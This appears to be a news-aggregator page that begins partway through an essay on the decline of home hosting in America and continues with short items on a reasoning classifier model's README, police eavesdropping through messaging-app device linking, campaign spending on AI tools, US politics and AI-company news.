But as I wrote in an essay last year on the “great American exercise boom,” the evidence suggests that, despite the increase in running clubs, the surge in exercise time seems to be mostly solo. A lot of people are going to the gym with a podcast to keep them company (e.g., me) or rolling out a yoga mat in the basement by herself (e.g., my wife). Most importantly, it is impossible to assert that Americans are getting out of the house to socialize in new ways when time spent at home has certifiably exploded since the 2010s.

In short, the great disinvitation is real, and we can’t wish or explain it away by arguing that Americans are just finding new ways to be with friends. Here are fourish explanations:

In the 1970 book The Harried Leisure Class , the Swedish economist Staffan Burenstam Linder wrote that as a society gets richer, leisure time takes on the frantic quality of work. As rich people feel like their downtime is scarce—as each non-working hour practically shouts, “excuse me! you could be making money, right now!” —the experience of leisure time speeds up. We multitask and pack various downtime activities into short periods. Firing up a Netflix show at 9pm that you can half-ignore while you answer email is a perfect activity for people who need their leisure time to feel like half-productive box-checking. Taking several hours to coordinate with other busy people to set up a lengthy dinner party is a tougher sell for the harried leisure class 1 .

That’s a sociological explanation, but I think the decline of hosting is also about macroeconomic trends. In Bowling Alone , Putnam acknowledged that women have historically been the keepers of the family social calendar, planning the birthday parties and neighborhood potlucks. For any number of reasons, women seem to do better than men at making and keeping adult friendships and making plans with other families. But in the 1950s and 1960s, tens of millions of women traded their unpaid household management jobs for salaried jobs, and the family social calendar frayed, as men failed to pick up the slack . As I’ve written:

In 1970, right around the inflection point of America’s social decline, the share of women between 25 and 54 who participated in the labor force surged past 50 percent for the first time; it’s currently near 80 percent. As more women poured their weekdays into 9-to-5 work, men failed to take over the logistical labor required to fill out the social calendar, and adult gatherings gradually eroded in the age of the dual-earner household.

Moving from macro to micro: My wife and I love to host parties at our place in D.C. But these get-togethers are a lot of work: conception, communication, coordination, shopping ( are your kids coming, or are you getting a babysitter? does your eldest kid eat eggplant? no? okay, we’ll make pasta. oh, that’s right, your wife’s gluten allergy…). These sort of multi-skilled logistical adventures are almost indistinguishable from the sort of logistical problem-solving that characterizes a good deal of white-collar work. But when both parents are already inundated with literal white-collar work, it’s hard to add the job of unpaid party planner.

The trouble with going all in on this explanation—beyond the fact that it embraces a version of learned helplessness for men—is that leisure time has increased overall since the 1950s. Theoretically, married couples should have even more time to have people over for food and drink. Other facts must be squeezing out socializing …

Americans used to have many kids whom they cared for sparsely; now they have fewer children to whom they devote every minute of their lives.

The numbers here are unreal. The sociologists Liana C. Sayer, Suzanne M. Bianchi, and John P. Robinson wrote in 2004 that between 1975 and 1998, mothers increased the amount of time they spent with their kids by about 200 minutes a week . In the 21st century, mothering time has continued to rise. For married fathers, parenting time increased by even more.

Thus evenings once spent hosting adults are now spent holding, bathing, driving, tutoring, playing with, and talking to their children.

If you’re going to throw a dinner party, there are a few things you probably need first. Say, a dinner table. Chairs. Food and drink. And also: friends. It is rare to host a dinner party for people you’ve never met. But the average number of close friendships is declining with each generation, and the decline is steepest for Americans without a college degree. So, it’s not just that married people have fewer dinner parties; poor people, who are less likely to be married, have fewer friends, period.

According to Data For Progress, the two groups most likely to say they never entertained people in their home in the previous year were political independents (44 percent) and people without a college diploma (39 percent). The latter isn’t surprising, given all the evidence that socializing is declining most rapidly among poorer Americans with less education. Hosting friends, like so much socializing, is in danger of becoming a luxury good.

The political wrinkle is more intriguing to me. I sometimes hear from people who tie everything back to politics that political polarization might lead to social fragmentation. But I wonder if the opposite is just as plausible. Maybe people who are less embedded in strong social networks are less likely to attach themselves to groups of all kinds, including political parties. In this way, America’s long-term detachment from groups and institutions is leading to a kind of pox-on-all-parties mentality that cashes out in an increase in independents.

There is a story you could tell about the rise of aloneness being the product of mostly positive trends. In the 20th century, perhaps, many housewives planned dinner parties out of a feeling of crushing isolation. Children were forced to attend church ceremonies that invalidated their identities and values. Americans felt suffocating social pressure to attend social events with neighbors and congregants that they hated. Now we are free to be exactly who and where we want to be.

For many, this freedom has taken the shape of a living-room couch. The average time that Americans spent at home increased by almost two hours a day from 2003 to 2022. Cocooned within personalized entertainment fortresses, more Americans have shrunk the vast buffet of all possible leisure activities to the small plate of screened media. As I wrote in my 2025 essay “Everything Is Television,” it sometimes feels as if the grand sweep of entertainment history is drawn toward the single attractor point of video, and especially short-form video. Something quite deep in the human psyche seems to want desperately to turn off our self-talk and silence our nattering internal monologues by turning up the volume of other characters’ voices.

In sum: The death of the host is the story of lonely unmarried people and harried married dual-earner households; anxious parents spending more time with their children and less time with friends; and the typical home becoming such a riot of diverting comfort that people no longer have to invite human beings to interrupt their boredom.

For 200 years, people have worried that machines would make human labor unnecessary. This false assumption is commonly known as the Lump of Labor fallacy. (The finite lumpiness of the labor market is the fallacy here, because people keep finding new lumpy problems to turn into jobs.) But machines in the last half century have accomplished something stranger. They have made other people less necessary to our leisure. Every generation has acquired better ways to entertain itself without leaving the house. The result is a peculiar triumph of modern abundance: We have built a world in which being alone has never been easier, more comfortable, or more fun. And then we wonder why everybody stopped coming over.

Leisure, as an activity to be enjoyed with other people, turns out to be more finite than work. The lump of labor fallacy was wrong, as technology keeps failing to replace jobs. But something else (the Lump of Leisure Theory?) might be right on the money. Social leisure turns out to be the real lump—something finite and easily displaced by technology. Our technology keeps getting better. Our social lives keep getting smaller.

Is this what we want? At the risk of invoking Clintonian levels of abstruseness , it depends on what “want” means. Everybody might prefer, in the abstract, a world of dinner parties, neighborhood friendships, and spontaneous gatherings. But on any given Wednesday at 7:45pm., it is easier to look at a screen than to host a party; easier to listen to a podcast while doing yoga than to plan a gathering. This is not so much an individual failure as a coordination failure. Modernity has shifted leisure from activities that require coordination with other people toward activities that can be consumed without the permission or participation of others. Compared to TikTok, a dinner party is a terrible leisure technology. It requires matching schedules, cleaning the house, buying food, accommodating children and allergies, tolerating awkwardness, and taking the risk that the evening is mediocre. By contrast, what does television ask of us? Nothing. TikTok? Even less. We keep creating opportunities for downtime that eliminate the need for other people to be present. Not all progress is progress.

Discussion about this post

Ready for more?

Jeeves. Reasoning improves Jev-like decision models

Hacker News
github.com
2026-09-29 07:13:54
Comments...
Original Article

A reasoning Jev-style classifier with a diffusion drafter, trained with SFT and CISPO.

Jeeves

Weights: 9B License: MIT

Acknowledgements

Inspired by Kev .

Highlights

  • A 9B Jev-like model (Qwen3.5-9B, LoRA, pointer head) that thinks before it decides, with a block-4 diffusion drafter and the full training code and train/dev/test data.
  • Beats Kev-9B and Jev on test data it was never trained on (0.889 vs 0.822 and 0.857) and on JevBench's public tiers (0.935 vs 0.866 for Jev).
  • Supports yes/no ( noul ), multiple-choice ( choice ), and rating ( score ) questions in the same request, through a Jev-compatible API.
  • About 0.3 s per request without thinking and a 3.3 s median with it on one H100. Can be sped up by truncating chain length.
  • Runs on CUDA (Hopper for the FP8 kernel).

Problem

Jev-like models give calibrated decision probabilities, but at low accuracy. A lot of pipelines therefore rely on a reasoning model as a fallback. Jeeves trains a Jev-like Qwen3.5-9B (LoRA and a pointer head) using CISPO to reason before it decides.

This results in better performance on out of domain tasks, and outperforms Jev in JevBench hard (public).

Results

Accuracy with thinking, greedy, 2,560-token cap. The Kev-9B and Jev columns are the numbers Kev publishes.

bench Kev-9B Jev Jeeves
Test overall (out-of-domain and held-out, item-weighted) 0.822 0.857 0.889
Transfer overall (MMLU-Pro and buried state) 0.579 0.800 0.746
JevBench overall (231 public items) 0.715* 0.866 0.935
QNLI 0.925 0.925 0.913
SciQ 0.963 0.988 0.991
TweetEval offensive 0.775 0.813 0.813
PAWS 0.763 0.788 0.875
MMLU 0.738 0.900 0.793
Emotion 0.600 0.588 0.647
Held-out rule structures 0.896 0.885 1.000
Contrastive policies 0.900 0.963 1.000
MMLU-Pro (10-way) 0.515 0.840 0.739
Buried state 0.740 0.700 0.759
Unknowable answered at p ≥ 0.9 (lower is better) 0.000 0.090 0.055
JevBench hard (111 public items) 0.451* 0.730 0.865
JevBench ECE (public items) 0.049 0.037

* No Kev-9B JevBench result is published. These are Kev-8B (Qwen3).

All JevBench numbers are on the public easy, standard and hard tiers (231 items). The sealed judge tier is not included, and the Jev and Kev numbers are restricted to the same public items.

Without thinking the same checkpoint scores 0.804 on our test split (2,962 items), against 0.840 with it.

Quickstart

Requirements: Python 3.12 and a CUDA GPU.

pip install -r requirements.txt

Download the released weights and serve them:

hf download PostHog/jeeves --local-dir jeeves-weights
python -m inference.serve --model jeeves-weights --drafter jeeves-weights/drafter_k4.safetensors --port 8009

Or fuse your own trained checkpoint into a standalone model and serve it with a drafter:

python export.py runs/cispo/final --out runs/fused
python -m inference.serve --model runs/fused --drafter runs/drafter_k4/drafter.safetensors --port 8009

Then send a request in Jev's format:

curl -s localhost:8009/v1/systemone -H 'content-type: application/json' -d '{
  "state": "Shoes arrived two weeks late and in the wrong size. Also I see two charges on my card.",
  "questions": {
    "department":  {"type": "choice", "instructions": "Which team should handle this?",
                    "criteria": {"returns": "Exchanges, refunds, wrong or damaged items",
                                 "shipping": "Delivery status, delays, lost packages",
                                 "billing": "Charges, invoices, payment problems"}},
    "escalate":    {"type": "noul", "instructions": "Does this need urgent human attention?"},
    "frustration": {"type": "score", "instructions": "How frustrated is the customer?",
                    "criteria": ["Calm", "Frustrated", "Very angry"]}
  },
  "options": {"max_think": 512}}'

Response on one H100 (FP8), with the three questions thinking in parallel:

{
    "model": "jeeves-latest",
    "answers": {
        "department": {
            "type": "choice",
            "choice": "billing",
            "confidence": 0.19,
            "probabilities": { "returns": 0.4, "shipping": 0.14, "billing": 0.46 }
        },
        "escalate": { "type": "noul", "noul": 0.72 },
        "frustration": {
            "type": "score",
            "score": 1.5,
            "legend": { "0": "Calm", "1": "Frustrated", "2": "Very angry" },
            "probabilities": { "0": 0.04, "1": 0.43, "2": 0.54 },
            "confidence": 0.75
        }
    },
    "usage": { "input_tokens": 129, "output_tokens": 160, "reasoning_tokens": 1536 },
    "latency_ms": 8141.6
}

Python

sdk/ is a drop-in replacement for Jev's Python SDK ( typesafe-sdk ):

from jeeves_sdk import Choice, Noul, Score, TypeSafeClient

with TypeSafeClient() as client:
    result = client.system_one(
        state="I was charged twice. Please help.",
        questions={
            "billing": Noul(instructions="Is this about billing?"),
            "tone": Choice(instructions="What is the tone?", criteria={"calm": None, "angry": None}),
            "urgency": Score(instructions="How urgent is this?", criteria=["can wait", "this week", "today"]),
        },
        max_think=768,
        return_reasoning=True,
    )
    print(result.nouls["billing"].noul, result.choices["tone"].choice, result.scores["urgency"].score)
    print(result.reasoning["tone"].text)

The client connects to http://127.0.0.1:8009 by default (or JEEVES_BASE_URL ), needs no API key, and waits up to 120s.

Options

options is optional and ignored by Jev clients that don't send it. Server-wide defaults are set with the matching serve flags.

option default effect
think true false answers from the prompt alone (about 0.3 s)
max_think 2560 truncates each reasoning chain at this many tokens, then answers
nothink_threshold null answers without thinking when the no-think confidence is at least this value
return_reasoning false adds each question's reasoning text to the response

On 325 dev questions:

setting accuracy mean reasoning tokens median / p90 latency
full thinking 0.825 1,138 3.3 s / 17.1 s
max_think 768, nothink_threshold 0.9 0.806 344 2.0 s / 5.6 s
no thinking 0.775 0 about 0.3 s

How it works

Questions, states and answers are loaded into the Qwen chat template like

<state> …state…
<q> instructions <opt> option 1 </opt> <opt> option 2 </opt> …
<think>

The model then rolls out its reasoning chain, and after the </think> token we append

</think>

<q> instructions <opt> option 1 </opt> <opt> option 2 </opt> …
<decide>

A pointer head scores each option with a scaled dot product between a query projection of the hidden state at <decide> and a key projection of the hidden state at that option's </opt> , where

<state>, <q>, <opt>, </opt>, <decide> = "<|fim_prefix|>", "<|fim_middle|>", "<|box_start|>", "<|box_end|>", "<|fim_suffix|>"

These are rare, largely unused tokens in the Qwen tokenizer. Ablations found that using plain text like "State" in the prompt instead worsened performance. Likewise, not repeating the questions after the reasoning block also decreases performance. The final probabilities are a softmax over the option scores, divided by a temperature fitted on the dev set.

Training

  1. SFT (2 epochs, 596 steps on 8 GPUs). LoRA r=16 on all projections of Qwen3.5-9B plus the pointer head, trained on 19,126 questions from 12 public datasets and synthetic policy data. Half the questions carry a reasoning chain sampled from the base model.
  2. CISPO (a 624-step schedule stopped at step 402). 9,992 RL questions, 8 rollouts each at temperature 1, capped at 2,560 thinking tokens.
  3. Calibration . A single temperature fitted on dev, stored with the checkpoint.

Stopping at step 402 keeps the best calibration and dev score. Past it, the head over-sharpens on the saturated RL pool.

Diffusion drafter

A diffusion view of the frozen model ( drafter/ ), inspired by Orthrus .

Unlike Orthrus, which supports attention-only models, it supports Qwen3.5's Gated DeltaNet layers by letting mask tokens cross-attend to those layers' post-convolution keys and values.

chain tokens per second
plain graphed greedy decoding, one question 109
block 4, one question 176 (1.6×)
block 8, one question 193 (1.76×)
block 4, eight questions batched about 960 in total

Block 4 is the default because it stays cheap when several questions are batched.

Reproduce

Data

You can build the datasets locally using the prep scripts. This downloads the public datasets from Hugging Face at the revisions pinned in prep/public.py :

Each public dataset stays under its own license.

Training

On 8 GPUs, with the data in data/ , bash run.sh runs the whole pipeline:

torchrun --nproc_per_node 8 train.py sft --run-dir runs/sft
torchrun --nproc_per_node 8 train.py cispo --run-dir runs/cispo --init runs/sft/final
torchrun --nproc_per_node 8 test.py runs/cispo/final
torchrun --nproc_per_node 8 jevbench.py runs/cispo/final
python export.py runs/cispo/final --out runs/fused
torchrun --nproc_per_node 8 -m drafter.gen --model runs/fused
torchrun --nproc_per_node 8 train.py drafter --model runs/fused --block 4 --run-dir runs/drafter_k4

Repository

path contents
model/ Qwen3.5 (Gated DeltaNet + gated attention), LoRA, pointer head
loader/ prompt format, tokenisation and batching
prep/ dataset construction ( prep.py ) and synthetic generators
trainer.py , train.py SFT, CISPO and drafter training
test.py , jevbench.py , calibrate.py evaluation, JevBench, temperature fitting
export.py fuses LoRA into a standalone model with the head and temperature
drafter/ drafter model, chain sampling, fused speculative decoder
inference/ FP8 kernel, batched speculative engine, Jev-compatible server and benchmark
sdk/ jeeves_sdk , a drop-in replacement for Jev's Python SDK with the reasoning options

Limitations

  • Knowledge questions trail Jev (MMLU 0.793 vs 0.900, MMLU-Pro 0.739 vs 0.840).
  • Thinking is slow at the tail: 17 s at p90 with full chains. Use max_think and nothink_threshold when latency matters.
  • The Kev and Jev comparisons outside JevBench use different items from the same sources.
  • No language consistency reward was included so thinking chains are not well interpretable.

Quote this

If you use Jeeves, its training recipe or its drafter, please cite:

@software{waltz2026jeeves,
  author = {Waltz, Nicholas P.},
  title  = {Jeeves: Reasoning Improves Jev-like Decisions},
  year   = {2026},
  url    = {https://github.com/PostHog/jeeves},
  note   = {Qwen3.5-9B decision model trained with SFT and CISPO, with a block-4 diffusion drafter}
}

References

Using Device Linking to Eavesdrop on WhatsApp and Signal

Schneier
www.schneier.com
2026-09-29 07:02:19
Modern messaging apps allow users to link their phone accounts to their computer desktop. Eavesdroppers are taking advantage of this capability: Apps such as WhatsApp Web and Signal Desktop allow people to use their accounts on other devices, such as laptops or desktop computers. Germany’s Cus...
Original Article

Modern messaging apps allow users to link their phone accounts to their computer desktop. Eavesdroppers are taking advantage of this capability:

Apps such as WhatsApp Web and Signal Desktop allow people to use their accounts on other devices, such as laptops or desktop computers.

Germany’s Customs Office has been using these features to connect a police-controlled computer to a suspect’s account.

Once connected, messages can be delivered to that computer without the police having to crack the encryption protecting them.

Netzpoltik details that police are able to gain access in this way either through physical access to someone’s phone or by intercepting verification codes via a state-sanctioned phishing attack or intercepting SMS messages via telephone surveillance.

That last paragraph is important. Making this work requires user consent.

What we want is a feature that displays connected devices, so users could notice if a new device gets connected to their account.

Tags: , , , ,

Posted on September 29, 2026 at 7:02 AM • 2 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.

New campaign disclosures reveal how much American political campaigns spend on AI tools

Guardian
www.theguardian.com
2026-09-29 07:00:49
Though politicians are quiet about how they use AI, the book Rewiring Democracy examines how AI is starting to influence American politics New campaign finance disclosure data shines a light on which US political campaigns are using AI tools and how much they are spending on them. Candidates’, part...
Original Article

New campaign finance disclosure data shines a light on which US political campaigns are using AI tools and how much they are spending on them.

Candidates’, parties’, and committees’ spending reveals that AI is fast becoming an essential tool of politics. The candidates themselves are quiet about how they are using the technology in their own campaigns . It’s a sensitive issue that we have been tracking closely since we started writing our book, Rewiring Democracy , which examined how AI is beginning to influence politics. A September 2025 Pew survey of Americans found that more than 70% would think less of a candidate if they used AI to help write a speech.

Itemized expenditure disclosure data from the US Federal Election Commission, dating back to 2020, reveals at least $17m in disclosed spending on AI technology vendors across 523 federal candidates and campaigns. Data from four states, California, Colorado, Massachusetts, and Washington, provides a more localized picture going back to 2022.

Beginning with the AI behemoths, at least 80 federal campaigns and committees have reported spending with OpenAI since 2024. The total spending is not huge: only about $50,000 reported, skewing slightly more Republican than Democratic. The Republican National Committee is the largest overall buyer, with nearly $10,000 in reported expenses. Top individual users include the campaigns of Republicans Mike Lawler, John Kennedy and Bill Cassidy, as well as California Democrats Ro Khanna and Ted Lieu. Most of these expenses are listed as office expenses, subscriptions to ChatGPT for staff, or research tools, rather than as specific political services. The company’s policies prohibit some political uses of their ChatGPT tool.

OpenAI’s biggest competitor, Anthropic, has rapidly built a similar level of usage , but with a different split. At least 65 candidates or committees now report paying the Claude maker in 2026, up from essentially zero in previous years, with a nearly two-to-one Democrat-to-Republican ratio. However, the largest individual user is the campaign of Tom Cotton, a Republican senator from Arkansas, who reported more than $4,000 in spend on Anthropic software in his June filing. Other major users are Montana Independent Senate candidate Seth Bodnar and Jason Knapp, who lost a Democratic House primary in Virginia, and Democratic Alaska Senate candidate Mary Peltola.

Candidates use either Claude or ChatGPT, rarely both, according to the disclosures. Only about 12% of campaigns or committees using either tool reported expenditures to both vendors. The Democratic lean of Anthropic usage may reflect the company’s alleged liberal skew and clashes with the Trump administration.

In contrast, Elon Musk’s xAI caters to Republican interests and, accordingly, its meager usage comes almost entirely from the political right. Just seven federal and two state-level candidates or committees have reported paying xAI, a total of about $5,000, the majority of which was spent by the presidential campaign of RFK Jr in 2024, but also includes Republicans Dave McCormick and Thomas Massie.

More dollars go to the vendors specializing in political campaign applications of AI. For years, AmplifAI , which provides automated text messaging , essentially a new iteration on robocalling technology, was a dominant target of spending, soaking up $4.7m in campaign spending in the 2022 cycle alone. It was used heavily by Democratic candidates including Mark Kelly, Joe Biden, Bernie Sanders and Adam Schiff. Now owned by the troubled media conglomerate Triller, spending on AmplifAI seems to have tapered off in the years since 2022.

The new rising Democratic solution for AI-powered text messaging is Daisychain , which has so far garnered about $300,000 in reported candidate spend in the 2026 cycle-up from only about $50,000 reported in 2024. More than half of this year’s spending comes from the Senate campaign of Democrat Abdul El-Sayed in Michigan.

The closest equivalent on the Republican side has been Campaign Nucleus , associated with former Trump campaign manager Brad Parscale . The AI-powered voter engagement tool has attracted six-figure spending from the Republican National Committee, multiple Pacs aligned with Donald Trump, and five-figure investments from Mike Johnson, Kari Lake and other candidates. It is displacing the legacy Republican-serving texting vendor Prompt.io , which has retained about $375,000 in 2026 spending to date, down from more than $500,000 in the 2022 cycle. But it continues to be used: the A More Affordable California Pac sponsored by Uber has single-handedly spent more than $1m on Prompt.io in 2026. Republican Massachusetts gubernatorial nominee Michael Minogue has been a recurring customer, as has failed Republican California gubernatorial candidate Ché Ahn and Republican-aligned Super Pac Neighbors for a Better Colorado .

At the state level

At the state level , the AI spending is smaller but growing fast. Across the four states studied, we found a total of at least $92,000 in spending confidently attributable to modern generative AI vendors since 2022. The spending is spread across at least 108 candidates and committees. The growth has been explosive; there has already been about ten times the amount of state-level AI spending reported in 2026 as there was in all of 2024.

skip past newsletter promotion

Much of the state spending mirrors federal patterns. Daisychain again has the highest overall spend, and OpenAI and Claude dominate among the general-purpose AI vendors. DonorAtlas – the AI-powered prospect research tool – sticks out for its usage in these states, sitting behind only Daisychain and OpenAI and buoyed up by nearly $4,000 in spending by the California Democratic party.

Even though it has dominated so much media conversation , few candidates seem to be reporting spending on AI tools designed specifically to create synthetic audio and video, also known as “deepfakes”. We found just six federal candidates or committees reporting spending on the popular AI audio generator tool from ElevenLabs, with total spending of about $1,400 led by independent candidate for Colorado’s sixth congressional district Samir Witta. The AI image generator service Midjourney has five reported federal campaign or committee users reporting about $1,600, led by Sholdon Daniels, the Republican primary runner-up in the Texas 30th district. Combined, those two firms had less than $100 in reported spend across the four states.

However, recent data from the Wesleyan Media Project shows that at least 164 political ads in this cycle have included AI-generated media, supported by at least $80m in ad spending. What this illustrates is that candidate and committee disclosure reports are just the tip of the iceberg. They don’t cover spending on AI by political consultants, media firms, and other vendors hired by the campaigns or by Pacs, or independent committees raising and spending money aimed at boosting candidates’ campaigns. Those entities aren’t required to disclose detailed expenditure reports, and are very likely where the bulk of campaign AI usage is happening.

Since a large fraction of all spending in the campaign cycle will happen in the final weeks leading to November, much remains to be seen about the totality of how campaigns will leverage AI and what impact its use will have on voters’ decisions.

Trump denies offering Iran sanctions relief for nuclear concessions – US politics live

Guardian
www.theguardian.com
2026-09-29 06:41:22
President uses social media post to deny reports that he was willing to ease sanctions in return for ‘concrete’ steps over its nuclear programSign up to the US Breaking News emailDonald Trump will host a meeting today with House speaker Mike Johnson and tech executives like Meta CEO ⁠Mark Zuckerberg...
Original Article

Trump denies offering Iran sanctions relief for nuclear concessions

Hello and welcome to the US politics live blog.

President Donald Trump said he has offered Iran nothing to end the war, rejecting media ⁠reports that cited US officials saying ⁠he was willing to ​ease sanctions and release frozen funds for “concrete” steps regarding Iran’s nuclear program.

“This is untrue. I offered them NOTHING,” Trump wrote on Truth Social on Monday.

Axios and CNN both reported, citing unidentified US officials, that Trump was willing to ⁠give Iran sanctions relief and free Iranian funds as part of a final deal on the condition that Iran showed “concrete progress” on the nuclear issue.

It comes as Iran’s Revolutionary Guards said Trump was ⁠a “big liar”, citing the ⁠president’s statements ​on ‌nuclear ‌weapons and other ‌issues.

“The ​enemy (US) knows that Iran ‌is not after ‌nuclear weapons,” spokesperson Hossein Mohebbi said. “Their issue with Iran is ‌not its nuclear programme but rather its vastness, which they want to destroy.“

Trump has cited preventing Tehran from acquiring a nuclear bomb as a key goal of the war, ⁠along with ending its ability to attack its neighbours and creating conditions for Iranians to topple their leadership. Iran does not have nuclear weapons and denies it wants ​to develop them, but argues it has the right to a domestic ‌nuclear energy capacity.

Iranian president Masoud Pezeshkian, in an ‌interview with the CBS show Face the Nation, said Tehran was ready for talks on its nuclear program and other issues, but would not accept “bullying or ‌coercion”.

“Iran is not seeking war, but will defend itself against pressure, threats and attacks,” Pezeshkian said, adding that it had already agreed that “we’re not supposed to develop nuclear weapons”.

US and Iranian officials spoke separately with mediators on Monday as part of a renewed effort to end the seven-month war, according to officials of both countries.

In other developments:

  • Anthropic will caution investors that artificial intelligence could pose “catastrophic or existential risks to humanity” in its IPO prospectus. As Anthropic prepares for an IPO listing, which could value the AI company at a monumental $2tn, it dedicated almost a third of its prospectus to discussing concerns around AI safety. The news comes as OpenAI has halted the release of its next AI model over safety concerns, the Wall Street Journal reports .

  • Trump will be on the campaign trail this week – hosting rallies in Durant, Oklahoma, on Thursday, Mobile, Alabama, on Friday and Vandalia, Ohio, on Saturday. The first two states are GOP strongholds, and Trump has pushed voters to turn out to the polls and pretend the president was at the top of the ballot this midterm cycle.

  • Pete Hegseth ordered the defense department to “protect and uphold the reliability of America’s voting mechanisms against external manipulation and disruption from foreign actors” in a 22 September memo . Hegseth’s order comes as concerns about artificial intelligence are on the rise, but also as the Trump administration has spread misinformation about voter fraud. In July, Trump accused China of interfering in the 2020 election, which he lost.

  • Andrew Bailey said he is stepping down as one of the FBI’s two deputy directors after just over a year in the role – a short tenure that unfolded as he helped oversee several of Trump’s election‑related investigations. Bailey was appointed in August 2025 to serve alongside Dan Bongino at a moment of sharp tension between the FBI and justice department leadership over the handling of the Jeffrey Epstein files.

  • Pope Leo addressed concerns about artificial intelligence and the war in Ukraine during a press conference onboard the papal plane today. Saying that concerns about AI are not “fake news”, the first US pope appeared to criticize Trump, who called concerns about AI a “hoax” during a UN address last week.

Key events

Former Trump prosecutor Jack Smith faces Senate hearing over 'abuse of authority' accusations

Former US special counsel Jack Smith will testify before the Senate Judiciary Committee on Tuesday, fielding questions about his past investigations into president Donald ⁠Trump as the Justice Department ⁠ramps up scrutiny of his ​work.

Republican lawmakers, who have repeatedly blasted Smith for what they see as vindictive, politically driven prosecutions of Trump and his allies, will likely allege Smith abused his authority and targeted conservatives in his investigations.

“Jack Smith ⁠must answer for what he did to hundreds of Republican groups and individuals,” Judiciary chair Chuck Grassley said in a statement.

Smith plans to tell senators that he stands by his prosecutions of Trump and will accuse the Trump administration of ⁠vilifying him and former members of his team, according to a copy of his opening statement seen by Reuters.

“I will not be silenced by the ​continued threats of prosecution from the president or others,” Smith plans ‌to tell lawmakers.

Democrats will likely defend Smith’s investigations ‌as holding Trump and others accountable for unlawful actions and argue Republicans are the ones trying to carry out vindictive justice on behalf of Trump.

Smith, ‌who brought two criminal cases against Trump over his alleged attempts to overturn the 2020 election and his alleged mishandling of classified documents after his first term, has defended his record. In court filings and public testimony, Smith has said his investigations followed Justice Department policy and were not influenced by politics. He has been the constant target of Trump, who has called for Smith’s prosecution.

Trump to host Zuckerberg and Amodei for AI talks later today

Donald Trump will host a meeting today with House speaker Mike Johnson and tech executives like Meta CEO ⁠Mark Zuckerberg and Anthropic’s Dario Amodei to discuss AI, as calls ramp up for more regulation of the fast-developing technology.

Nvidia CEO Jensen Huang and OpenAI president Greg Brockman ⁠are also expected to ⁠attend, separate sources familiar with the planning told Reuters.

The gathering will focus on finding a balance between innovation and oversight, Republican Johnson said on Monday, as concerns about rogue AI ⁠agents’ potential to harm humans have seeped into the public consciousness, boosting calls for regulation.

Trump has called the fears of AI’s threat to humanity a “hoax.“

Trump to speak at America's 'golden age' event

Donald Trump will give a speech as part of an event celebrating America’s ‘golden age’ at 10am EDT.

The president is set to discuss a new tool, America.gov, which is aimed at improving citizens’ access to federal government services.

Other participants are expected to include SpaceX CEO Elon Musk, Nvidia CEO Jensen Huang, US secretary of state Marco Rubio, energy secretary Chris Wright, Nasa administrator Jared Isaacman and former White House press secretary Karoline Leavitt.

The event takes place on the same day that Trump meets at the White House with House speaker Mike Johnson and artificial intelligence leaders.

Trump denies offering Iran sanctions relief for nuclear concessions

Hello and welcome to the US politics live blog.

President Donald Trump said he has offered Iran nothing to end the war, rejecting media ⁠reports that cited US officials saying ⁠he was willing to ​ease sanctions and release frozen funds for “concrete” steps regarding Iran’s nuclear program.

“This is untrue. I offered them NOTHING,” Trump wrote on Truth Social on Monday.

Axios and CNN both reported, citing unidentified US officials, that Trump was willing to ⁠give Iran sanctions relief and free Iranian funds as part of a final deal on the condition that Iran showed “concrete progress” on the nuclear issue.

It comes as Iran’s Revolutionary Guards said Trump was ⁠a “big liar”, citing the ⁠president’s statements ​on ‌nuclear ‌weapons and other ‌issues.

“The ​enemy (US) knows that Iran ‌is not after ‌nuclear weapons,” spokesperson Hossein Mohebbi said. “Their issue with Iran is ‌not its nuclear programme but rather its vastness, which they want to destroy.“

Trump has cited preventing Tehran from acquiring a nuclear bomb as a key goal of the war, ⁠along with ending its ability to attack its neighbours and creating conditions for Iranians to topple their leadership. Iran does not have nuclear weapons and denies it wants ​to develop them, but argues it has the right to a domestic ‌nuclear energy capacity.

Iranian president Masoud Pezeshkian, in an ‌interview with the CBS show Face the Nation, said Tehran was ready for talks on its nuclear program and other issues, but would not accept “bullying or ‌coercion”.

“Iran is not seeking war, but will defend itself against pressure, threats and attacks,” Pezeshkian said, adding that it had already agreed that “we’re not supposed to develop nuclear weapons”.

US and Iranian officials spoke separately with mediators on Monday as part of a renewed effort to end the seven-month war, according to officials of both countries.

In other developments:

  • Anthropic will caution investors that artificial intelligence could pose “catastrophic or existential risks to humanity” in its IPO prospectus. As Anthropic prepares for an IPO listing, which could value the AI company at a monumental $2tn, it dedicated almost a third of its prospectus to discussing concerns around AI safety. The news comes as OpenAI has halted the release of its next AI model over safety concerns, the Wall Street Journal reports .

  • Trump will be on the campaign trail this week – hosting rallies in Durant, Oklahoma, on Thursday, Mobile, Alabama, on Friday and Vandalia, Ohio, on Saturday. The first two states are GOP strongholds, and Trump has pushed voters to turn out to the polls and pretend the president was at the top of the ballot this midterm cycle.

  • Pete Hegseth ordered the defense department to “protect and uphold the reliability of America’s voting mechanisms against external manipulation and disruption from foreign actors” in a 22 September memo . Hegseth’s order comes as concerns about artificial intelligence are on the rise, but also as the Trump administration has spread misinformation about voter fraud. In July, Trump accused China of interfering in the 2020 election, which he lost.

  • Andrew Bailey said he is stepping down as one of the FBI’s two deputy directors after just over a year in the role – a short tenure that unfolded as he helped oversee several of Trump’s election‑related investigations. Bailey was appointed in August 2025 to serve alongside Dan Bongino at a moment of sharp tension between the FBI and justice department leadership over the handling of the Jeffrey Epstein files.

  • Pope Leo addressed concerns about artificial intelligence and the war in Ukraine during a press conference onboard the papal plane today. Saying that concerns about AI are not “fake news”, the first US pope appeared to criticize Trump, who called concerns about AI a “hoax” during a UN address last week.

New Cyber-OSINT model released

Hacker News
twitter.com
2026-09-29 06:23:33
Comments...
Original Article

The Cyber-OSINT model that You can run locally. - MoE (26B total, 4B active, 262K ctx) trained on 6,500 OSINT/CTI instructions. - SFT for cyber threat intel and investigative work. - Threat-actor attribution. - IoC pivoting. Geolocation. - Admiralty source grading. - 262K context.

a 7B cyber model that fits on locally 8GB GPU. - finetuned cyber/DevOps post-training datasets for offensive and defensive work. - 32K native. - 131K with YaRN. Most security model are a system prompt. This one is an actual finetune. - huggingface.co/DeepHat/DeepHa…

Anthropic ‘warns of existential AI risks to humanity’ in IPO document

Guardian
www.theguardian.com
2026-09-29 06:17:58
Reported admission to investors of AI’s ‘self-preserving behaviours’ comes as company prepares for a potential $2tn flotation Anthropic is telling investors that advanced AI could pose “catastrophic or existential risks to humanity”, according to reports, as it prepares for a potential $2tn (£1.5tn)...
Original Article

